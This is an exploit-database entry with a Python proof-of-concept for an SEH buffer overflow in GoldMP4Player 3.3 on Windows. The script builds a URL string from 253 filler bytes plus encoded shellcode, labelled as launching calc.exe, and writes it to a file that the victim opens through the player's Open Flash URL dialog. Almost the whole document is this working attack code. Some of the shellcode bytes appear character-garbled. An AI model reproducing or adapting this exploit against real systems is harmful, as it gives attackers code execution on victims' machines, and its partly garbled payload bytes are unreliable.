#; GoldMP4Player Buffer Overflow (SEH)

1. #; Full title    GoldMP4Player Buffer Overflow (SEH)
2. Date add    2014-02-28
3. Category    local exploits
4. Platform    windows
5. Risk    <font color="#FFFF00">Security Risk Medium</font>
6. Vendor  http://download.cnet.com/GoldMP4Player/3000-2139_4-10967424.html
7. Affected ver    Version: 3.3
8. Tags    27.02.2014  
9. ========================================================
10.  
11. #!/usr/bin/python
12. # coding: utf-8
13. #Exploit Title: GoldMP4Player Buffer Overflow (SEH)  
14. #Software Link: http://download.cnet.com/GoldMP4Player/3000-2139_4-10967424.html
15. #Version: 3.3
16. #Date: 27.02.2014                                                                
17. #Tested on: Windows Win 7 En
18. # Howto / Notes:
19. #open the URL in filename via File -> Open Flash URL\n";
20. #-------------------------------------------------------
21. '''Credits:
22. Vulnerability POC identified in v3.3 by Gabor Seljan
23. http://www.exploit-db.com/exploits/31914/'''
24. #------------------------------------------------------
25. head="http://"
26. buff="\x41" * 253
27. #shell calc.exe
28. buff+=("ëÿÿœ¼‰áÛÖÙqôZJJJJJJJJJJJCCCCCC7RYjAXP0A0AkAAQ2AB2BB0BBABXP8"
29. "ABuJIylHhlIePePGpapMYJEFQiBBDlKpRVPnk3btLNkv24TlKrRDhdOMgBj7Vtq9oTq9PllUlpac"
30. "LdBFLa09QHO4M31kwjBL01BpWLKpRvpNk3rElFaZpnk1PBXou9PQdPJvajpbplKrhR8NkpXa0wqI"
31. "CIsgLqYlKp4nkgqKfEakOVQIPllzaHOtMuQxGGHYpsEJTVcSMYh5kqm141ehbchNkshtdWqYC0fLK"
32. "fl2klKrx5LWqxSlKgtlKuQxPmYstEtEtsksku10YcjpQkOypf8QOpZLKeBhkk6QMSZ31nmouMiGpEP"
33. "s0f02HdqlKpoLGkOjuOKjPOEI2QFCXi6NuoMomkOju5ls6SL6jOpkKYpsE4EOKBgdSd20orJWppSio"
34. "IERCParLbCDnbEsH0e30AA")
35. head2=".swf"
36.  
37. exploit=head + buff + head2
38. try:
39.     out_file = open("exploit.txt",'w')
40.     out_file.write(exploit)
41.     out_file.close()
42. except:
43.     print "Error"